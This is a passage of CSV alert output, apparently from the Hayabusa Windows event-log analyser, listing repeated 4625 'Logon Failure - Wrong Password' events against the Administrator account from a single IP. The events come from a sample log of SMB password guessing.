+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: 
